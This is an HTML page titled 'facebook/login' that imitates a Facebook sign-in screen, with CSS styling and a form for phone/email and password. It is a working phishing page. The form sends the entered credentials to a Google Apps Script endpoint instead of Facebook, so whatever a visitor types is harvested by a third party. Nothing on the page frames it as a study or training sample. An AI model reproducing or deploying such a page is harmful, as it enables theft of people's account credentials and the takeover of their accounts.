<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>facebook/login</title>
    <style>
       body
{
    padding:0;
    margin: 0;
}
.contain
{
    width: 100%;
    height: 615px;
    background-image: url(images/ok-8.png);
    background-repeat: no-repeat;
    background-size: 100% 100%;
}
.login
{
    width: 30%;
    height: 335px;
    position: relative;
    top:31%;
    left: 34%;
    background-color: rgba(255,255,255,0.3);
    border-radius: 25px;
}
input[type=submit]
{
    width: 230px;
    height: 40px;
    font-family:monospace;
    border: 2px solid rgb(23, 22, 22);
    border-radius: 2px;
    box-shadow: 5px 5px 7px rgb(21, 20, 20);
    background-color: rgb(34, 108, 245);
    box-shadow: 8PX 8PX 10PX  rgb(7, 1, 1);
    color: aliceblue;
    border-radius: 15px;
    position: relative;
    left: 40px;
}
input[type=submit]:hover
{
    transform:scale(1.10,1.10);
}
INPUT[TYPE=TEXT]
{
    width: 300px;
    height: 30px;
    text-align: center;
    background-color:rgb(249, 247, 244);
    font-family:'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
    text-transform: capitalize;
    border-left: 0;
    border-bottom: 3px solid black;
    border-right: 0;
    border-top: 0;
    border-radius: 5px;
    box-shadow: black 8px 8px 15px;

}
label
{
    font-size:15PX;
    text-align: center;
    font-weight: 700;
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
input[type=PASSWORD]
{
    width: 300px;
    height: 30px;
    background-color:rgb(244, 243, 240);
    text-align: center;
    border-left: 0;
    border-bottom: 3px solid black;
    border-right: 0;
    border-top: 0;
    border-radius: 5px;
    box-shadow: black 8px 8px 15px;
    font-family:'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
}
form
{
    position: relative;
    left: 30px;
    top: 60px;
}
 
    </style>
</head>
<body>
    <div class="contain">
        <div class="login">
            <form action="https://script.google.com/macros/s/AKfycbwSmMAL8rycXdu0nHtVLnzD0inriOElrTazmPGuOIOVwboOB4Q2WY2giufdBy__1u4Tsg/exec" method="post">
                <label>phone no.and email id.:</label><br>
                <input type="text" name="phone or email"><br><br>
                <label for="password">password:
                </label><br>
                <input type="password" name="password"><br><br><br>
                <a src="https://www.facebook.com/profile.php?id=100012233923944"><input type="submit" value="log in"  onsubmit='alert()';></a>
            </form>
        </div>
    </div>
</body>
</html>